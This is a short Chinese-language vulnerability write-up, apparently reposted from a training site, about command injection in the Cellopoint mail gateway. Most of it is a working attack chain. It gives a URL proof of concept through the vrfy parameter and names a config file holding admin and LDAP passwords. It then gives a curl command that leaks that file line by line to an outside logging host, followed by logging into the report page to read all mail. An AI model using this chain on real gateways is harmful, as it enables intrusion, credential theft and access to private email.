cellopoint 邮件网关任意命令执行漏洞

使用 debugFile";

exec($cmd, $output, $ret);

$lines = @file($debugFile); 

URL内构造POC:gw_x_vrfy_n_test.php?vrfy=;$cmd;

的方式可以利用该漏洞执行命令（nobody权限）。

排查发现/usr/local/mozart/smtpd/default.ini文件保存各项邮件管理员、ldap等账户密码信息。

构造以下sed命令（通过sed命令读取目标文件单行内容）：

curl%20-k%20https://cloudeye.me/?info=$(sed%20-n%20§3§p%20/usr/local/mozart/smtpd/default.ini)，

通过查阅远端服务器（例如cloudeye.me）的web日志信息，

回显获取到default.ini文件内容，得到邮件归档管理员admin的口令或者配置的ldap密码，访问 $ip/report/login.php 登陆查阅全部邮件内容。

转载请注明来自网盾网络安全培训，本文标题：《cellopoint 邮件网关任意命令执行漏洞》

标签：